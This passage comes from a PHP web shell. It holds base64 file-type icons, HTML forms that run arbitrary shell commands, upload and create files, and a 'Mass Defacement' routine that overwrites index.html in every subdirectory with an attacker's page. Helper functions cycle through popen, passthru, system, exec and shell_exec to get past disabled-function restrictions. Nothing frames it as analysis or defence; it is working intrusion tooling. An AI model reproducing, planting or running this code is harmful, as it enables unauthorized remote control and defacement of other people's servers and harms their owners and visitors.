2461"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2462"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2463"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2464"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2465"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2466"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2467"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2468"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2469"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2470"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2471"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2472"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2473"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2474"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
2475"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
2476"up"=>
2477"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
2478"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
2479"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
2480"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
2481"write"=>
2482"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
2483"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
2484"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
2485"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
2486"ext_asp"=>
2487"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
2488"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
2489"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
2490"ext_mp3"=>
2491"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
2492"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
2493"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
2494"ext_avi"=>
2495"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
2496"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
2497"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
2498"ext_cgi"=>
2499"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
2500"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
2501"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
2502"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
2503"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2504"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2505"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2506"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
2507"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
2508"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
2509"RYtMAgEAOw==",
2510"ext_cmd"=>
2511"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
2512"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
2513"dmrYAMn1onq/YKpjvEgAADs=",
2514"ext_cpp"=>
2515"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
2516"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
2517"Eq7YrLDE7a4SADs=",
2518"ext_ini"=>
2519"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
2520"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
2521"SnEjgPVarHEHgrB43JvszsQEADs=",
2522"ext_diz"=>
2523"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
2524"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
2525"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
2526"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
2527"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
2528"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
2529"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
2530"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
2531"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2532"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2533"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2534"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2535"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2536"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2537"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
2538"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
2539"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
2540"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
2541"Ow==",
2542"ext_doc"=>
2543"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
2544"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
2545"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
2546"ext_exe"=>
2547"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
2548"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
2549"xhIAOw==",
2550"ext_h"=>
2551"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
2552"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
2553"Wq/NknbbSgAAOw==",
2554"ext_hpp"=>
2555"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
2556"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
2557"UqUagnbLdZa+YFcCADs=",
2558"ext_htaccess"=>
2559"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
2560"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
2561"AAA7",
2562"ext_html"=>
2563"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
2564"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
2565"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
2566"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
2567"ADs=",
2568"ext_jpg"=>
2569"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
2570"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
2571"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
2572"FxEAOw==",
2573"ext_js"=>
2574"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
2575"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
2576"a00AjYYBbc/o9HjNniUAADs=",
2577"ext_lnk"=>
2578"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
2579"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
2580"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
2581"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
2582"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
2583"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2584"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2585"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
2586"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
2587"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
2588"ADs=",
2589"ext_log"=>
2590"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
2591"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
2592"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
2593"ext_php"=>
2594"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp".
2595"aGeyYpqJlRG/rlwAADs=",
2596"ext_pl"=>
2597"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
2598"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
2599"ext_swf"=>
2600"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
2601"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2602"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
2603"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
2604"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
2605"ext_tar"=>
2606"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
2607"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
2608"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
2609"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
2610"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2611"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2612"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2613"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
2614"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
2615"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
2616"u4tLAgEAOw==",
2617"ext_txt"=>
2618"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
2619"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
2620"UpPWG3Ig6Hq/XmRjuZwkAAA7",
2621"ext_wri"=>
2622"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
2623"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
2624"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
2625"ext_xml"=>
2626"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
2627"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2628"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
2629"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
2630"IQA7"
2631);
2632//Untuk optimalisasi ukuran dan kecepatan.
2633$imgequals = array(
2634"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
2635"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
2636"ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
2637"ext_html"=>array("ext_html","ext_htm"),
2638"ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
2639"ext_lnk"=>array("ext_lnk","ext_url"),
2640"ext_ini"=>array("ext_ini","ext_css","ext_inf"),
2641"ext_doc"=>array("ext_doc","ext_dot"),
2642"ext_js"=>array("ext_js","ext_vbs"),
2643"ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
2644"ext_wri"=>array("ext_wri","ext_rtf"),
2645"ext_swf"=>array("ext_swf","ext_fla"),
2646"ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
2647"ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
2648);
2649if (!$getall) {
2650header("Content-type: image/gif");
2651header("Cache-control: public");
2652header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
2653header("Cache-control: max-age=".(60*60*24*7));
2654header("Last-Modified: ".date("r",filemtime(__FILE__)));
2655foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
2656if (empty($images[$img])) {$img = "small_unk";}
2657if (in_array($img,$ext_tar)) {$img = "ext_tar";}
2658echo base64_decode($images[$img]);
2659}
2660else {
2661foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
2662natsort($images);
2663$k = array_keys($images);
2664echo "<center>";
2665foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
2666echo "</center>";
2667}
2668exit;
2669}
2670
2671echo "</td></tr></table>\n";
2672/*** COMMANDS PANEL ***/
2673?>
2674
2675<table class=mainpanel>
2676<tr><td align=right>Command:</td>
2677<td><form method="POST">
2678<input type=hidden name=act value="cmd">
2679<input type=hidden name="d" value="<?php echo $dispd; ?>">
2680<input type="text" name="cmd" size="100" value="<?php echo htmlspecialchars($cmd); ?>">
2681<input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute">
2682</form>
2683</td></tr>
2684<tr><td align=right>Quick Commands:</td>
2685<td><form method="POST">
2686<input type=hidden name=act value="cmd">
2687<input type=hidden name="d" value="<?php echo $dispd; ?>">
2688<input type=hidden name="cmd_txt" value="1">
2689<select name="cmd">
2690<?php
2691foreach ($cmdaliases as $als) {
2692echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
2693}
2694foreach ($cmdaliases2 as $als) {
2695echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
2696}
2697?>
2698</select> <input type=submit name=submit value="Execute">
2699</form>
2700</td></tr>
2701<tr><td align=right>Upload:</td>
2702<td><form method="POST" enctype="multipart/form-data">
2703<input type=hidden name=act value="upload">
2704<input type=hidden name="miniform" value="1">
2705<input type="file" name="uploadfile"> <input type=submit name=submit value="Upload"> <?php echo $wdt." Max size: ". @ini_get("upload_max_filesize")."B"; ?>
2706</form>
2707</td></tr>
2708<tr><td align=right>PHP Filesystem:</td>
2709<td>
2710<?php ##[ Acid ]## ?>
2711<script language="javascript">
2712function set_arg(txt1,txt2) {
2713document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
2714document.forms.fphpfsys.arg1.value = txt1;
2715document.forms.fphpfsys.arg2.value = txt2;
2716}
2717function chg_arg(num,txt1,txt2) {
2718if (num==0) {
2719document.forms.fphpfsys.arg1.type = "hidden";
2720document.forms.fphpfsys.A1.type = "hidden";
2721}
2722if (num<=1) {
2723document.forms.fphpfsys.arg2.type = "hidden";
2724document.forms.fphpfsys.A2.type = "hidden";
2725}
2726if (num==2) {
2727document.forms.fphpfsys.A1.type = "label";
2728document.forms.fphpfsys.A2.type = "label";
2729document.forms.fphpfsys.arg1.type = "text";
2730document.forms.fphpfsys.arg2.type = "text";
2731}
2732document.forms.fphpfsys.A1.value = txt1 + ":";
2733document.forms.fphpfsys.A2.value = txt2 + ":";
2734}
2735</script>
2736<?php
2737echo "<form name=\"fphpfsys\" method=\"POST\"><input type=hidden name=act value=\"phpfsys\"><input type=hidden name=d value=\"$dispd\">\r\n".
2738"<select name=\"phpfsysfunc\">\r\n";
2739foreach ($phpfsaliases as $als) {
2740if ($als[1]==$phpfsysfunc) {
2741echo "<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
2742}
2743else {
2744echo "<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
2745}
2746}
2747echo "</select>\r\n".
2748"<input type=label name=A1 value=\"File:\" size=2 disabled> <input type=text name=arg1 size=40 value=\"".htmlspecialchars($arg1)."\">\r\n".
2749"<input type=hidden name=A2 size=2 disabled> <input type=hidden name=arg2 size=50 value=\"".htmlspecialchars($arg2)."\">\r\n".
2750"<input type=submit name=submit value=\"Execute\"><hr noshade size=1>\r\n";
2751foreach ($sh_sourcez as $e => $o) {
2752echo "<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\r\n";
2753}
2754echo "</form>\r\n";
2755?>
2756</td></tr>
2757<tr><td align=right>Search File:</td>
2758<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
2759<input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
2760</form>
2761</td></tr>
2762<tr><td align=right>Create File:</td>
2763<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
2764<input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
2765</form></td></tr>
2766<tr><td align=right>View File:</td>
2767<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
2768<input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
2769</form></td></tr>
2770<?
2771$self=basename($_SERVER['PHP_SELF']);
2772if(isset($_POST['execmassdeface']))
2773{
2774echo "<center><textarea rows='10' cols='100'>";
2775$hackfile = $_POST['massdefaceurl'];
2776$dir = $_POST['massdefacedir'];
2777echo $dir."\n";
2778
2779if (is_dir($dir)) {
2780if ($dh = opendir($dir)) {
2781while (($file = readdir($dh)) !== false) {
2782if(filetype($dir.$file)=="dir"){
2783$newfile=$dir.$file."/index.html";
2784echo $newfile."\n";
2785if (!copy($hackfile, $newfile)) {
2786echo "failed to copy $file...\n";
2787}
2788}
2789}
2790closedir($dh);
2791}
2792}
2793echo "</textarea></center>";} ?>
2794
2795
2796<tr><td align=right>Mass Defacement:</td>
2797<td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>' name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface' value='Execute'></form></td>
2798
2799
2800</table>
2801<?php footer(); ?>
2802</body></html>
2803<?php
2804
2805
2806function safemode() {
2807if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
2808else { return FALSE; }
2809}
2810function getdisfunc() {
2811$disfunc = @ini_get("disable_functions");
2812if (!empty($disfunc)) {
2813$disfunc = str_replace(" ","",$disfunc);
2814$disfunc = explode(",",$disfunc);
2815}
2816else { $disfunc= array(); }
2817return $disfunc;
2818}
2819function enabled($func) {
2820if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
2821else { return FALSE; }
2822}
2823function tpexec($cmd) {
2824$output = "";
2825if ( enabled("popen") ) {
2826$h = popen($cmd.' 2>&1', 'r');
2827if ( is_resource($h) ) {
2828while ( !feof($h) ) { $output .= fread($h, 2096); }
2829pclose($h);
2830}
2831}
2832elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2833elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2834elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2835elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2836return $output;
2837}
2838function tpexec2($cmd) {
2839$output = "";
2840if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2841elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2842elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2843elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2844elseif ( enabled("popen") ) {
2845$h = popen($cmd.' 2>&1', 'r');
2846if ( is_resource($h) ) {
2847while ( !feof($h) ) { $output .= fread($h, 2096); }
2848pclose($h);
2849}
2850}
2851return $output;
2852}
2853function which($pr) {
2854$path = tpexec("which $pr");
2855if(!empty($path)) { return $path; } else { return $pr; }
2856}
2857
2858function get_status() {
2859function showstat($sup,$stat) {
2860if ($stat=="on") { return "$sup: <font color=orange><b>ON</b></font>"; }
